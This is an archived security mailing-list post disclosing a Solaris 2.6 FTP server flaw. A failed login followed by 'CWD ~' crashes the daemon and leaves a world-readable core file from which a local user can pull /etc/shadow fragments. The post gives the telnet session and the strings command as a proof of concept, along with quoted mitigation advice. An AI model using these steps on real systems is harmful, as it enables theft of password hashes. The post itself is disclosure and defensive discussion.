Yes. It is possible that local user can get the part of shadow file in
Solaris 2.6 since the core file is world readable.

[root /usr/sbin]> telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3. <-- a valid username
pass blahblah <--- a wrong password
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root /usr/sbin]> ls -l /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
[root /usr/sbin]> strings /core|more
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445:::
[...snip...]

---Original Message---
[...snip...]
>
>However, this can present other problems, so you should ensure that core
>dumps are disabled for inetd (add "ulimit -c 0" before starting inetd in
>/etc/init.d/inetsvc) or at least that they are not world readable (add a
>umask line); they are world readable by default under 2.6.
>
>--
> ghandi / ghandimindless.com / www.dopesquad.net
> "Bein' Crazy is the least of my worries." - Jack Kerouac
> C439 2B06 D8D2 A2D8 1ABB 0A55 A61D 9057 63F5 9B1F

Regards,
Warning3 <warning3mail.com>
http://www.nsfocus.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]